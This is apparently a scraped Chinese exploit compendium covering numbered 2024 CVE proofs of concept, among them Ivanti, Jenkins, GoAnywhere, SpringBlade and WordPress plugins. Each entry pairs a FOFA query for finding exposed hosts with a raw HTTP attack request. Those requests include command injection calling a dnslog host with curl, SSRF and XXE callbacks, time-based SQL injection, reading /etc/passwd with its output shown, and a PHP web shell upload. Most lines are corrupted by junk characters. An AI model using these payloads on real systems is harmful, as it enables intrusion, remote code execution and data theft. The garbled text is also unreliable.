% q- z1 [0 U: x2 m5 I8 J2 Q% tFOFA:app="Ncast-产品" && title=="高清智能录播系统", y- w, \) n+ g, v2 |
POST /classes/common/busiFacade.php HTTP/1.1) j6 d8 {$ f* L! L" p0 ]; a+ R6 W
Host: 192.168.40.130:80807 M1 ?8 A6 `5 d6 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ g M' ]) V! v3 P6 eConnection: close
0 A. b5 q y) c: c, K+ |$ ~7 SContent-Length: 154' @* p+ L6 q- |
Accept: */*
6 m' F5 p6 b2 ]6 a8 R7 \Accept-Encoding: gzip, deflate# _: \5 k$ q. T; b4 C5 _! M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 B6 ^) f9 y7 F. w+ s1 ?' LContent-Type: application/x-www-form-urlencoded; charset=UTF-8
) v( g6 K( i& T" D% _X-Requested-With: XMLHttpRequest+ u% S( |2 h, }) v2 H6 S: L" z4 Z
2 w4 k; }# n% [
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
; S4 N- |# K+ L7 F0 Y! a) V7 g2 i1 ^7 O( j# f7 q
* I) p" u; b1 ?100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 G. l6 i" K' A3 _- x! YCVE-2024-0352
% L/ ~- _; `5 t& s) M( uFOFA:icon_hash="874152924") r! E# z! O- p! y1 a2 @
POST /api/file/formimage HTTP/1.1
6 B+ Y' ^' C0 |/ z- O5 C" b* MHost: 192.168.40.130/ b: R' c" L$ u' b- q
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.363 p5 `9 B+ J/ J- I- b$ ]8 K
Connection: close
9 `) p! T' G: l; YContent-Length: 201
- d' D1 S$ V: u- N9 o tContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
3 O* c) J5 e5 Z" q' GAccept-Encoding: gzip( N( I6 X' k# \1 l% I9 N) r6 R
# u! B, ~4 q0 z, p+ f# t% z x------WebKitFormBoundarygcflwtei
% A8 Y7 o: b# oContent-Disposition: form-data; name="file";filename="IE4MGP.php"
f4 ~0 T+ b: Z* m! c5 S5 s7 o: Z: HContent-Type: application/x-php- m- f! C6 _3 J, u
% r: r A, O: ^% Z* r2ayyhRXiAsKXL8olvF5s4qqyI2O
" w% w8 f% ?. a4 z) Y9 _6 U# V l, W------WebKitFormBoundarygcflwtei--: P# ^# f. b2 p+ \
$ d4 I: g, P! j% |: l; _/ H' d! x8 x8 S1 z3 C" [
101. ivanti policy secure-22.6命令注入
: j- [) b/ V& ^5 ]CVE-2024-21887
+ Z0 K- Z& }' s& a% V# M0 [5 UFOFA:body="welcome.cgi?p=logo"
" @3 n, J, X9 i, d4 q+ zGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1, `# v6 q: N+ s( T
Host: x.x.x.xx.x.x.x
, b, ^5 k6 x( R* a. JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 a- k. W: `0 c
Connection: close$ i* b' G" K1 p$ C
Accept-Encoding: gzip6 C, h9 o) g2 I8 W/ o+ s& h9 m
4 z$ x: W+ t0 F4 u8 X) O! ]
! ^& z6 D$ |& k& o' U9 S
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
7 T* x& @9 s: {CVE-2024-21893
* F$ Z1 b& x7 b! |7 QFOFA:body="welcome.cgi?p=logo"1 K* J; U" ^( V3 H% f- h% c0 l
POST /dana-ws/saml20.ws HTTP/1.1
) ^: Y4 X4 x+ rHost: x.x.x.x
/ H' G: F" ?4 \7 B8 D8 j, s9 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, y9 H' m' T8 w9 E, \1 O2 j& b0 }7 P( L
Connection: close. R4 C5 L, u+ ` K3 ~3 D1 X$ h- {
Content-Length: 7920 B* Q/ ?: |6 r" n; Y x
Accept-Encoding: gzip
2 {1 e3 M3 V3 g0 Z1 q x: m/ `; P2 n9 `* k) K) T
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
! h6 k2 H8 g) C' q1 b7 U
6 x% K9 D$ t1 v4 n1 x( B103. Ivanti Pulse Connect Secure VPN XXE7 i! ~4 M& L: ^; G$ ~: x( r
CVE-2024-220243 x4 G8 x6 E% N1 S
FOFA:body="welcome.cgi?p=logo"1 o+ J; v2 D! h+ C/ z) ~# Z: ^
POST /dana-na/auth/saml-sso.cgi HTTP/1.11 V1 d3 r; M% f- b0 g8 q* F
Host: 192.168.40.130:111
$ L/ p; q' Y" [User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 s: J3 W* V6 X- P1 e# k% K6 {
Connection: close
" I+ }& \( ^& y+ ]/ `Content-Length: 204$ _( g) F8 ]) [/ k1 `0 V
Content-Type: application/x-www-form-urlencoded
5 v! B) Z/ I+ H3 K4 @Accept-Encoding: gzip2 s7 }7 U) _8 O" b6 ~
- C, q3 W% q: |! k* q2 xSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
2 o# K7 t& x# k" o1 B) J2 |' g( _3 e, b; P3 l) k4 ]
6 E! Y* U7 ` m$ Z" T& E其中SAMLRequest的值是xml文件内容的base64值,xml文件如下% F" S$ q6 k& n O2 N& @- \! ~
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
, ~7 F$ M, a0 |1 j3 M! O9 [) |! j1 Z. G6 U6 s
* B4 h1 D$ K6 v2 l' I2 M104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
4 P9 E# S$ ^. d* `/ R u% ~CVE-2024-0569! h4 c h% t9 t( K) f
FOFA:title="TOTOLINK" G5 T, }! k9 O: C( H
POST /cgi-bin/cstecgi.cgi HTTP/1.1
+ b% e" a7 g, rHost:192.168.0.1/ d2 g( {$ C" v& O7 [' g$ @
Content-Length:41
W+ B/ p7 |* ]Accept:application/json,text/javascript,*/*;q=0.01
, w+ P+ a/ s* `8 T3 J* iX-Requested-with: XMLHttpRequest) u6 F4 r4 ?! j
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36 k+ g/ B/ l, `& K5 B) r* V5 E. g
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
' T$ }2 c1 H* }0 `: ~. W. @Origin: http://192.168.0.1* u1 e5 U: q/ y5 T
Referer: http://192.168.0.1/advance/index.html?time=16711523805648 l; ^/ J) ]2 N9 o6 B* C% \5 ]5 J
Accept-Encoding:gzip,deflate
9 T0 U* \' c: n7 |; M+ H+ pAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.77 @- q/ O4 L. F# q" X
Connection:close
* g* T. r1 I7 s- u R* Z( b k# T3 v4 K4 l
{
. ]( \6 O7 K7 Y6 E2 Y; Y( l: i"topicurl":"getSysStatusCfg",
4 @4 ` a0 l% u P5 k$ u& Q"token":""7 T- u" o$ Q) S
}8 Q9 G4 H: O q
% N6 [& {- B( n4 X. o7 K105. SpringBlade v3.2.0 export-user SQL 注入" b& C8 i) s5 x
FOFA:body="https://bladex.vip"* S7 V( `& D+ \0 E" G
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
3 x, ? m, m. k7 W% n. D R0 ]+ g1 l, u
106. SpringBlade dict-biz/list SQL 注入
! [! q- [4 e8 p9 d( v0 i0 ?FOFA:body="Saber 将不能正常工作"% w* A; u: ?9 X9 m
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1, g& f# l! \- r! `# m3 H% u) s" [
Host: your-ip( B1 C- Q3 f" W4 G$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 E5 r1 A6 x- ]% |1 F7 q) Y, q
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
' t6 n' C; V u& [Accept-Encoding: gzip, deflate
2 D% A+ O/ _' @8 fAccept-Language: zh-CN,zh;q=0.9
0 R# A2 E. q" {! T, GConnection: close
5 m! ]6 N0 D3 k! f" L* `
4 W+ m, S9 d$ g* d
. v d! ~3 s# B: @, o3 ]107. SpringBlade tenant/list SQL 注入: v+ [* ?$ M6 |+ ?! m; Y
FOFA:body="https://bladex.vip"
( n0 o" S5 s1 \! |7 o6 ^, `% t0 RGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
" }" D4 |5 N; Z5 o& KHost: your-ip, W6 D7 h) J. I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) `* P# e) t2 L. yBlade-Auth:替换为自己的4 |, a4 T8 H/ z+ Q1 N
Connection: close# Y" I, B& J, x' G/ v, v
+ z* z) _ ^1 Y3 x- S9 k
# ^0 p- f' t& I( R: J
108. D-Tale 3.9.0 SSRF+ D* J0 O# A2 H: R! u8 r" R
CVE-2024-21642
' f% {) d; d2 X- o& o6 B9 ^/ X3 x& |FOFA:"dtale/static/images/favicon.png"6 @2 f& Y% d( Y0 i9 d
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1* @: Z; C6 x! o7 _- C" |, w0 D# w
Host: your-ip, J/ ?( `2 @# @4 @" ~
Accept: application/json, text/plain, */*
# c( E1 g* A1 r+ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ T8 g8 o$ D5 N) }- U1 \Accept-Encoding: gzip, deflate# T$ ~ |$ ~& O: J0 ^
Accept-Language: zh-CN,zh;q=0.9,en;q=0.81 Z1 w/ T; w% l6 s X$ u
Connection: close! \, Q, y/ h6 p/ D; i3 z
% m+ _, `2 s" I) D, X2 ?
2 c. y# @" K$ H# }; q' h {7 k \; w109. Jenkins CLI 任意文件读取
3 K( I. o& u6 A' u9 B0 C5 LCVE-2024-23897
; _2 D$ O p8 V. }FOFA:header="X-Jenkins"
# |! k9 i: g3 Q& g( I3 sPOST /cli?remoting=false HTTP/1.1
- p5 K% v* E% ]& mHost:
/ i7 u$ ~7 I0 {6 zContent-type: application/octet-stream
; C1 @5 d2 c" C9 {% F- V& cSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
# B. t* {1 S$ V }- XSide: upload
" N' k% \* c2 ?2 m0 X6 b# X; ZConnection: keep-alive
1 n) i' M) n- W) OContent-Length: 163' F R B( q, t; S- A! [/ _2 `
: A3 H- R/ F; n0 M6 i. _
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'$ `' i9 S$ A/ }+ V: o2 O0 D# e
; ]3 Y9 b: Y1 j" n, W! ]9 }
( P, F& I. T& n& G7 o2 [POST /cli?remoting=false HTTP/1.1, l3 O3 x% s+ ^) M2 o2 G- y5 K
Host:
% M; U4 }1 F1 i$ z- hSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 `# ?7 \7 Q/ z+ r1 i# hdownload
6 E( b5 [6 q9 ^# W2 rContent-Type: application/x-www-form-urlencoded* n: u# a+ m' L9 R$ R: e: L; }8 x3 [
Content-Length: 0
9 i4 O" M! ]3 j3 q, j8 D
+ y, V& T v" I& F9 X$ y3 K3 g1 R" I9 {) a/ u/ \
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin; `& ~/ S* S. ?- u; ~
java -jar jenkins-cli.jar help
3 l& h* \7 T7 X[COMMAND]
* }( C% P0 F" R5 Z+ g+ h# t9 |Lists all the available commands or a detailed description of single command. t! Q& ?( V2 Q0 K
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
6 p: p& J1 h% P M; y- s, c* Q0 P
+ c$ _: H- r" E4 T, k" W0 j1 `& e V$ W0 O% K4 `+ X
110. Goanywhere MFT 未授权创建管理员0 p+ H& Q+ a4 T& P& w
CVE-2024-0204; y1 Y# P- U7 k8 \/ t
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"" V, j/ Z1 R* R' @% o( o
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1; R4 l% P6 G" E& P
Host: 192.168.40.130:8000 |- e9 n# v/ b$ [( f; b
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
8 [/ N. U: E3 WConnection: close
9 q% b4 W: F. d* iAccept: */*
0 H# \) |4 {4 N; B& i& sAccept-Language: en, L m1 j! n+ E3 `8 v
Accept-Encoding: gzip# d6 L' q! t& H1 |& w9 n
* N: \# K8 F! {( W" I6 ?. c$ X$ w2 N6 ~6 Z% o
111. WordPress Plugin HTML5 Video Player SQL注入8 M% ?% n* T1 m# s+ J8 r
CVE-2024-1061, d$ K3 R( i% N! h5 u$ l4 M
FOFA:"wordpress" && body="html5-video-player"
1 A5 X& x0 n# f9 DGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
! L9 h' D5 W& Q# s9 kHost: 192.168.40.130:112( m! x. ?# r% u- t* ]. v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 O( q1 t5 M' @( \Connection: close4 |+ C5 [- A- M% L) C5 z( r$ G
Accept: */*
: S/ h1 t% S% OAccept-Language: en
$ \8 G' F4 a' A x4 `Accept-Encoding: gzip
0 j, [: o$ \5 F+ F' {# l& T. M2 \) q% }
4 y# u- l2 v2 r1 y) C- C112. WordPress Plugin NotificationX SQL 注入* @/ d9 h' `% ~2 |# a
CVE-2024-1698
1 g9 b% H* e0 GFOFA:body="/wp-content/plugins/notificationx"; P9 x I2 k/ q8 q0 [
POST /wp-json/notificationx/v1/analytics HTTP/1.13 [( Y" Y6 G2 Q r' G
Host: {{Hostname}}" N: ~% B5 L7 G9 F9 B- W2 G ?
Content-Type: application/json
, i- f1 w% ? q" ]7 [. V8 X. v
5 z, K% d$ A5 J: {$ c{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
# |& _! p0 n8 S4 { t2 {
* B, x9 W2 Z3 D, k: e0 M2 f& S2 T3 K/ x8 x- i% x L# j! y
113. WordPress Automatic 插件任意文件下载和SSRF) u( W9 N5 u' J3 {6 a& ^; h, L
CVE-2024-27954+ K- O, m! W" ^7 z# _
FOFA:"/wp-content/plugins/wp-automatic"9 N a9 K! g( }) O. \9 l# g
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1! H j2 z, u* e; C1 f, j: u0 s; w
Host: x.x.x.x/ W( s! D6 a1 d
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: I/ J6 M: r9 v, [5 c1 SConnection: close
4 h7 ?' M+ m6 h1 s3 \Accept: */*
4 e, n" F5 n I* T f+ y9 N9 hAccept-Language: en1 g3 _) b4 u+ }; P5 U
Accept-Encoding: gzip7 m, X( I5 R# P- f( M: e4 \# n6 m
0 O1 ?% U, b- _( T- G
/ S. E& E- ~- k! h) t7 q8 Z
114. WordPress MasterStudy LMS插件 SQL注入7 ^5 U3 z# O+ i! [ M p$ e' O
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
" _- g4 z/ X6 `, n4 b! \. zGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
! J$ }% \4 b7 c) Y/ H$ uHost: your-ip! U; A3 Y! F9 M& \+ d" h# @4 r; p
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. A- I u+ L( Q% s9 A
Accept-Charset: utf-8 j$ s [! O: N4 x2 h2 R0 x T
Accept-Encoding: gzip, deflate+ C5 q6 `4 m9 s! p$ s
Connection: close
* ~4 W6 H: b( _+ e1 u( `" U, ^8 W5 ?, i: |$ i) K
; t% } @, Y3 P; {2 l' v
115. WordPress Bricks Builder <= 1.9.6 RCE
( E- O$ B- A* LCVE-2024-25600
. r$ d s5 s ]& ]7 x s" Z4 ~FOFA: body="/wp-content/themes/bricks/"3 \0 m- \& O) j5 F' Y. Y
第一步,获取网站的nonce值
3 ~0 r% p8 A, u7 f% x7 ~- Y9 TGET / HTTP/1.16 w) v- k3 o: { x: g8 @' E0 [, T: |
Host: x.x.x.x! }% Q7 y5 K2 r0 t
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
- f6 v; Q7 a8 ?- ]9 ?Connection: close0 G$ B; V) F. A0 K/ o% Q$ t
Accept-Encoding: gzip
, Q# O- ?1 I+ R3 m& F# i M
7 p& J g0 f1 \6 y, Z4 h/ F
! i# z) C# R7 t1 O2 u9 e5 Q% Y4 \第二步替换nonce值,执行命令
' k8 c, s; y+ |/ H) GPOST /wp-json/bricks/v1/render_element HTTP/1.13 T. h$ E3 a, ?, ^
Host: x.x.x.x: k8 |3 T7 O9 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' o8 b% R' d! z6 t2 g0 c$ Q" B2 ^2 D, GConnection: close8 v3 ^/ g U0 m' U
Content-Length: 356
$ q+ P& F) d9 g$ v0 @9 y4 I8 oContent-Type: application/json
4 Q/ K" R9 R! B0 f4 ZAccept-Encoding: gzip! w1 U# E7 l1 v1 m# p2 i
2 x1 x/ B v+ Q( G# v r8 s$ `{
, K7 v$ y% ^/ L3 N( V. H"postId": "1",
% }1 z/ R# {0 G+ V5 f8 B( @ "nonce": "第一步获得的值",
9 Z. v5 l! C" a' M% t, ~1 D2 W( b "element": {
5 x9 N5 `9 D% p "name": "container",. H4 ~5 b% C1 G' Y2 b: A
"settings": {/ V% Y" _5 z% n4 {. a
"hasLoop": "true",3 I2 l3 H9 N* s7 z; A5 P
"query": {, b6 o# V( K: V5 r
"useQueryEditor": true,
6 s6 y0 \. C' T( x& B3 r "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",1 O+ B2 i1 T8 g! @, D
"objectType": "post"
2 m" J$ x7 [ `; m }
# s" J# [7 j$ h6 J. y }9 E$ T: p; A X$ A" z! B
}* O; g5 c- f! q: u; Q( K' K
}
V0 ~2 f: ]8 G4 Z
! t# c) H& t+ M# e9 T! O
3 C+ G- z, |9 X( ~9 H116. wordpress js-support-ticket文件上传( Q1 ]; [6 }$ r' K
FOFA:body="wp-content/plugins/js-support-ticket"5 d9 Y+ G, p" ?' E
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1* o: G0 U! N& E' N( v& B
Host:( i4 d( N8 f1 d! X: @
Content-Type: multipart/form-data; boundary=--------767099171
; i2 c' C! {- [User-Agent: Mozilla/5.0
* C' | W4 P. ~& ~& w
" v+ s: h( t& o9 f( j0 s) v----------767099171# Q6 ~" U- h. s# E0 Q/ r; x
Content-Disposition: form-data; name="action"1 w3 b* c3 g( J+ S( Y# w @2 u# i
configuration_saveconfiguration7 @& [ L n4 p5 N
----------767099171
0 ]- O& x+ J6 F) uContent-Disposition: form-data; name="form_request"! n' E9 e! l g) z* W3 O! l
jssupportticket
; T$ F+ y) P2 Y4 Y6 c' h$ N----------767099171
4 L, h( W4 u' R! d# |Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"$ i$ J1 V1 @: T3 G' t( [
Content-Type: image/png7 E3 E6 w& a4 T. d! m7 B! D
----------767099171--
+ I* M; U: h2 \1 t: b* M# J9 j2 N: Z
( Q6 m+ n/ y$ [+ i0 _1 R- X/ c& V3 |9 x. n8 Q3 u; D$ A- {% C
117. WordPress LayerSlider插件SQL注入" q, {- F- y5 q/ y: r6 q
version:7.9.11 – 7.10.0
$ C4 `9 d# w1 [8 l2 s* V7 OFOFA:body="/wp-content/plugins/LayerSlider/"
l9 c( W7 s( x7 z v1 I# b& @GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1. V+ w" L$ m/ H9 w
Host: your-ip: ~( t' t$ z& u @+ K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% {8 W5 S/ z& `! JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: O' f) Z- n; S+ k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 {$ }4 a) S% K1 Q$ B4 ~
Accept-Encoding: gzip, deflate, br: S$ A0 P; F2 @1 ]9 I% i
Connection: close
4 }1 Q- {0 P+ W5 rUpgrade-Insecure-Requests: 1- d) n; Z% X q5 _6 p8 c7 i
. c5 T' H) c& J/ n+ q' p: Y/ ?$ |& b; y
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传2 k2 H1 E& }0 M9 g {# a4 i
CVE-2024-0939
: d2 W2 @' }+ l. G* B" @+ {FOFA:title="Smart管理平台"
/ Y0 @% U% l' [* A9 @4 T4 RPOST /Tool/uploadfile.php? HTTP/1.1
* ~) O% U- G' F8 SHost: 192.168.40.130:84437 n5 K2 |+ _( B$ e1 C8 l
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8* ?. A) q5 p- O2 s+ _# H# T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0) b. U& c1 v l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 R( C _" L0 M, D' {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 M- z* c. y+ k1 U! DAccept-Encoding: gzip, deflate
h; o# R8 a8 M NContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
/ A: u2 b0 @) l& WContent-Length: 405
) D4 Z, y4 f1 t) S4 |8 ]Origin: https://192.168.40.130:8443) i% u: E8 z T) I5 r# @& h
Referer: https://192.168.40.130:8443/Tool/uploadfile.php! _4 j/ K' T5 A3 A
Upgrade-Insecure-Requests: 1# A+ d4 R( P5 p" M6 T9 \
Sec-Fetch-Dest: document
# f$ M: s/ P: |4 o( A) gSec-Fetch-Mode: navigate
5 G* G9 W. E' t5 r9 a/ x% ZSec-Fetch-Site: same-origin I/ M; i& P4 `% D! v6 X
Sec-Fetch-User: ?1' ^) g; C; D% o" _; R
Te: trailers
6 I }2 ]' \+ [' cConnection: close
& X7 I2 [0 D: T. A; ~! P" m, U/ o/ l
/ d9 h' a9 Y* ^& k( Q2 t-----------------------------139797012227476466340371828879 _1 j6 a$ h( r d! }3 T. `' G0 h
Content-Disposition: form-data; name="file_upload"; filename="contents.php"9 q' _6 }3 J N& _* ^% _" o
Content-Type: application/octet-stream
/ X+ n F6 o9 S& h6 D9 }1 x+ F4 A9 O: ~( w
<?php
4 }8 @. I- L0 l$ w, P8 Zsystem($_POST["passwd"]);
: |$ h8 U7 h/ c( q7 \, R?>
_% D- B# y% b" s; f2 r-----------------------------139797012227476466340371828873 s5 O- N2 t0 E+ t# d
Content-Disposition: form-data; name="txt_path"6 O$ B2 K1 y1 h' o8 {( ^) b8 A
- R% v" ?7 b" G6 N) {& `
/home/src.php
# R2 L2 N0 R+ n-----------------------------13979701222747646634037182887-- S& R* x. A2 e7 k
1 Y% O9 c9 j/ {* u+ b
# y& Q5 B# p( V
访问/home/src.php
; S: ~4 |% K+ F; h7 o5 ?4 `) r. d) \
119. 北京百绰智能S20后台sysmanageajax.php sql注入/ C3 }% [3 v# O; o4 o
CVE-2024-1254
) N$ y7 U6 C3 ^FOFA:title="Smart管理平台"
c5 A5 K: M$ q. q先登录进入系统,默认账号密码为admin/admin
% N, ?! [ X& W: {POST /sysmanage/sysmanageajax.php HTTP/1.11) j# F- ^& g7 E
Host: x.x.x.x
$ g' ~ `; q; rCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
7 j+ {: \2 i- J5 d. y1 ?1 S7 s* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
0 U/ x. N+ w+ x3 y( b' YAccept: */* v3 {1 H4 t6 q3 B# H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* m' ], A2 q9 j; k ]
Accept-Encoding: gzip, deflate9 ]+ r8 [, H4 i3 o l
Content-Type: application/x-www-form-urlencoded;% o- w( `/ P" C. V) [; f4 i
Content-Length: 109
6 T# C$ y7 \- E) ?3 L1 G! R' `Origin: https://58.18.133.60:8443
8 V+ x' T* c% R0 f- x' V. _3 wReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php. Q# G& E! i4 _. j9 e' N" g
Sec-Fetch-Dest: empty
/ h6 X6 V' C. y* b( O$ oSec-Fetch-Mode: cors
& a$ [* A. w) J1 e6 ~# e1 `# uSec-Fetch-Site: same-origin! Q8 a3 ~' D4 p* s& d; e6 n3 v
X-Forwarded-For: 1.1.1.17 U( t, [8 E4 {
X-Originating-Ip: 1.1.1.1, x- B- v& c6 K& p* X: N
X-Remote-Ip: 1.1.1.1
8 s9 V7 J; G$ `5 m9 ]6 aX-Remote-Addr: 1.1.1.11 f" Z8 m# J& k8 Z( Q
Te: trailers
5 p. D% R# U$ q, P) [0 MConnection: close
8 i: ]" }' l! N6 F, z M
# @! t& y' G' _+ F9 msrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
, L3 N C. y8 G1 A( \8 D! |) e/ N; y) E7 k/ D5 b) }+ w
" C9 t" s: h; m# l' h5 r, Y2 |
120. 北京百绰智能S40管理平台导入web.php任意文件上传$ A2 D- l% _+ {4 {8 j
CVE-2024-1253
1 u! U% ]- M. t/ U2 RFOFA:title="Smart管理平台"1 H0 J) O ^+ c" ?- T
POST /useratte/web.php? HTTP/1.1" O0 H1 e; V2 c
Host: ip:port H# e& u, i7 Z* O, U& m
